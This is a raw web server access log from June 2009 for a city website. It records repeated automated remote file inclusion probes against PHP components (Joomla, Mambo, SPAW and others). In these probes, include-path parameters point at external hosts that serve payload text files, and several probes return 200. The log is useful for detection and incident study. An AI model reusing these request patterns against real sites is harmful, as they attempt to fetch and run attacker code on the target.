125.251.147.130 - - [30/Jun/2009:21:12:18 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:12:26 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:21:15:27 -0700] "GET /logs/access_080330.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:21:15:27 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:21:15:32 -0700] "GET /logs/access_080531.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:19:10 -0700] "GET /logs/access_080330.log%20//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:19:14 -0700] "GET /logs/access_080330.log%20//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:21:20:53 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:21:20:53 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:21:20:53 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:21:21:17 -0700] "GET /logs/access_080531.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:24:05 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:24:05 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:24:05 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:24:19 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:24:19 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:24:19 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
80.93.50.112 - - [30/Jun/2009:21:27:28 -0700] "GET //vwar/backup/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.93.50.112 - - [30/Jun/2009:21:27:28 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.93.50.112 - - [30/Jun/2009:21:27:28 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:29:49 -0700] "GET /logs/access_080330.log%20//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:29:49 -0700] "GET /logs/access_080330.log%20//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:21:30:31 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:21:30:31 -0700] "GET /logs/access_080531.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:21:30:31 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:31:17 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:31:17 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:31:17 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:34 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:34 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:34 -0700] "GET /logs/access_080531.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:37 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:38 -0700] "GET /logs/access_080531.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:40 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:40 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:40 -0700] "GET /logs/access_080531.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:49 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:49 -0700] "GET /logs/access_080531.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [30/Jun/2009:21:31:49 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:32:25 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:32:25 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:32:25 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
124.138.156.3 - - [30/Jun/2009:21:33:22 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [30/Jun/2009:21:33:23 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [30/Jun/2009:21:33:23 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [30/Jun/2009:21:33:34 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [30/Jun/2009:21:33:34 -0700] "GET /logs/access_080531.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [30/Jun/2009:21:33:36 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:21:33:46 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:21:33:46 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:21:33:46 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:21:40:56 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:21:48:27 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:21:48:27 -0700] "GET /logs/access_080531.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:21:48:27 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:21:51:17 -0700] "GET /logs/access_080531.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:21:51:17 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:21:51:17 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.15.152.12 - - [30/Jun/2009:21:56:03 -0700] "GET /logs/access.log/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.15.152.12 - - [30/Jun/2009:21:56:03 -0700] "GET /errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.15.152.12 - - [30/Jun/2009:21:56:03 -0700] "GET /logs/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.15.152.12 - - [30/Jun/2009:21:56:15 -0700] "GET /logs/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.15.152.12 - - [30/Jun/2009:21:56:15 -0700] "GET /errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.15.152.12 - - [30/Jun/2009:21:56:15 -0700] "GET /logs/access.log/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:21:59:52 -0700] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:21:59:52 -0700] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:21:59:52 -0700] "GET /logs/access.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:22:00:20 -0700] "GET /logs/access.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:22:00:20 -0700] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:22:00:20 -0700] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:22:03:31 -0700] "GET /logs/access_080531.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:22:04:56 -0700] "GET /logs/access.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:22:04:58 -0700] "GET /logs/access.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:14:02 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:14:02 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:14:02 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:14:34 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:14:39 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:14:39 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
72.30.78.227 - - [30/Jun/2009:22:15:18 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
72.82.228.83 - - [30/Jun/2009:22:25:57 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.82.228.83 - - [30/Jun/2009:22:25:57 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.82.228.83 - - [30/Jun/2009:22:25:57 -0700] "GET /logs/access_080531.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.82.228.83 - - [30/Jun/2009:22:28:11 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.82.228.83 - - [30/Jun/2009:22:28:11 -0700] "GET /logs/access_080531.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.82.228.83 - - [30/Jun/2009:22:28:11 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:22:29:17 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:22:29:17 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:22:29:33 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:22:29:33 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:22:29:33 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:22:30:03 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:22:30:23 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:22:30:23 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:22:30:23 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:30:49 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:30:49 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:30:49 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:31:06 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:31:14 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:31:14 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:31:14 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:31:29 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:22:32:58 -0700] "GET /logs/access_080330.log//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
